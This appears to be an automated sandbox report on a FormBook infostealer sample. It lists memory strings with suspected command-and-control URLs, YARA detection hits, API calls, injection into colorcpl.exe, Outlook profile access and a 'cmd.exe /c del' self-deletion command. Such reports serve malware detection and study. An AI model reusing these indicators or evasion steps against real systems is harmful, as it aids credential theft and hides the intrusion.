          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/Dental_Plans.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3xgJjo
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/__media__/js/trademark.php?d=panoramazoom.com&type=mng
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/d9s8/?Fzr4zDK=3AET6
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/display.cfm
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/find_a_tutor.cfm?fp=Oi7aXOv0PsK81jpYl4yd2uiVyxdpDUznP7KDJEVTi%2Baf3xgJjo
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/px.js?ch=1
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/px.js?ch=2
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.panoramazoom.com/sk-logabpstatus.php?a=QzMweEEycEZWaENUMTVFK1J3Z29lVUxpaFBhMlRuRUxaZmFpaF
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.258611599.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: colorcpl.exe, 00000005.00000002.497294283.0000000000A3A000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Ll
          Source: Scn14.092020.exe | String found in binary or memory: https://www.digicert.com/CPS0
          Source: colorcpl.exe, 00000005.00000002.502248751.00000000052DD000.00000004.00000001.sdmp | String found in binary or memory: https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=panoramazoom.com&search=pre

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator. Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory. Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417930 NtCreateFile, 1_2_00417930
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004179E0 NtReadFile, 1_2_004179E0
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417A60 NtClose, 1_2_00417A60
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417B10 NtAllocateVirtualMemory, 1_2_00417B10
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004179DA NtReadFile, 1_2_004179DA
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417987 NtReadFile, 1_2_00417987
          Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_00417B0A NtAllocateVirtualMemory, 1_2_00417B0A
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99860 NtQuerySystemInformation, LdrInitializeThunk, 5_2_04A99860
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99840 NtDelayExecution, LdrInitializeThunk, 5_2_04A99840
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A999A0 NtCreateSection, LdrInitializeThunk, 5_2_04A999A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A995D0 NtClose, LdrInitializeThunk, 5_2_04A995D0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99910 NtAdjustPrivilegesToken, LdrInitializeThunk, 5_2_04A99910
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99540 NtReadFile, LdrInitializeThunk, 5_2_04A99540
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A996E0 NtFreeVirtualMemory, LdrInitializeThunk, 5_2_04A996E0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A996D0 NtCreateKey, LdrInitializeThunk, 5_2_04A996D0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99610 NtEnumerateValueKey, LdrInitializeThunk, 5_2_04A99610
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99660 NtAllocateVirtualMemory, LdrInitializeThunk, 5_2_04A99660
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99A50 NtCreateFile, LdrInitializeThunk, 5_2_04A99A50
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99650 NtQueryValueKey, LdrInitializeThunk, 5_2_04A99650
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99780 NtMapViewOfSection, LdrInitializeThunk, 5_2_04A99780
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99FE0 NtCreateMutant, LdrInitializeThunk, 5_2_04A99FE0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99B00 NtSetValueKey, LdrInitializeThunk, 5_2_04A99B00
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99710 NtQueryInformationToken, LdrInitializeThunk, 5_2_04A99710
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A998A0 NtWriteVirtualMemory, 5_2_04A998A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A998F0 NtReadVirtualMemory, 5_2_04A998F0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99820 NtEnumerateKey, 5_2_04A99820
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9B040 NtSuspendThread, 5_2_04A9B040
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A995F0 NtQueryInformationFile, 5_2_04A995F0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A999D0 NtCreateProcessEx, 5_2_04A999D0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99520 NtWaitForSingleObject, 5_2_04A99520
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9AD30 NtSetContextThread, 5_2_04A9AD30
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99560 NtWriteFile, 5_2_04A99560
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99950 NtQueueApcThread, 5_2_04A99950
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99A80 NtOpenDirectoryObject, 5_2_04A99A80
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99A20 NtResumeThread, 5_2_04A99A20
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99A00 NtProtectVirtualMemory, 5_2_04A99A00
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99A10 NtQuerySection, 5_2_04A99A10
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99670 NtQueryInformationProcess, 5_2_04A99670
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A997A0 NtUnmapViewOfSection, 5_2_04A997A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9A3B0 NtGetContextThread, 5_2_04A9A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99730 NtQueryVirtualMemory, 5_2_04A99730
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9A710 NtOpenProcessToken, 5_2_04A9A710
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99760 NtOpenProcess, 5_2_04A99760
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99770 NtSetInformationFile, 5_2_04A99770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A9A770 NtOpenThread,5_2_04A9A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A579E0 NtReadFile,5_2_00A579E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57930 NtCreateFile,5_2_00A57930
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57A60 NtClose,5_2_00A57A60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57B10 NtAllocateVirtualMemory,5_2_00A57B10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57987 NtReadFile,5_2_00A57987
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A579DA NtReadFile,5_2_00A579DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A57B0A NtAllocateVirtualMemory,5_2_00A57B0A
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00408A401_2_00408A40
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041C2A71_2_0041C2A7
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABE31_2_0041ABE3
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041ABE61_2_0041ABE6
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041B4641_2_0041B464
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041BCC51_2_0041BCC5
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402D891_2_00402D89
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_0041B6191_2_0041B619
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A820A05_2_04A820A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B220A85_2_04B220A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A6B0905_2_04A6B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B228EC5_2_04B228EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B110025_2_04B11002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A6841F5_2_04A6841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B1D4665_2_04B1D466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A825815_2_04A82581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A6D5E05_2_04A6D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B225DD5_2_04B225DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A50D205_2_04A50D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A741205_2_04A74120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A5F9005_2_04A5F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B22D075_2_04B22D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B21D555_2_04B21D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B222AE5_2_04B222AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B22EF75_2_04B22EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A76E305_2_04A76E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A8EBB05_2_04A8EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B21FF15_2_04B21FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B1DBD25_2_04B1DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04B22B285_2_04B22B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5C2A75_2_00A5C2A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A48A405_2_00A48A40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5ABE65_2_00A5ABE6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5ABE35_2_00A5ABE3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5BCC55_2_00A5BCC5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5B4645_2_00A5B464
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A42D895_2_00A42D89
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A42D905_2_00A42D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A5B6195_2_00A5B619
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_00A42FB05_2_00A42FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04A5B150 appears 35 times
          Source: Scn14.092020.exeStatic PE information: invalid certificate
          Source: Scn14.092020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: Scn14.092020.exe, 00000001.00000002.275241278.000000000144F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scn14.092020.exe
          Source: Scn14.092020.exeBinary or memory string: OriginalFilename vs Scn14.092020.exe
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275107248.00000000012F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274700832.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241197768.00000000041F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.497338456.0000000000A40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500071699.00000000047F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241143881.0000000004141000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.498579259.0000000002BE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275445198.0000000001660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Scn14.092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@14/11
          Source: C:\Users\user\Desktop\Scn14.092020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scn14.092020.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_01
          Source: Scn14.092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Scn14.092020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Scn14.092020.exeVirustotal: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\Scn14.092020.exe 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Scn14.092020.exeProcess created: C:\Users\user\Desktop\Scn14.092020.exe C:\Users\user\Desktop\Scn14.092020.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scn14.092020.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Scn14.092020.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Scn14.092020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Scn14.092020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: wntdll.pdbUGP source: Scn14.092020.exe, 00000001.00000002.275241278.000000000144F000.00000040.00000001.sdmp, colorcpl.exe, 00000005.00000002.500174223.0000000004A30000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Scn14.092020.exe, 00000001.00000002.275241278.000000000144F000.00000040.00000001.sdmp, colorcpl.exe

Data Obfuscation:

Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xD599EBD7 [Sat Jul 24 05:59:51 2083 UTC]
Source: C:\Users\user\Desktop\Scn14.092020.exe | Code function: 1_2_004148E6 push es; retf 1_2_004148ED
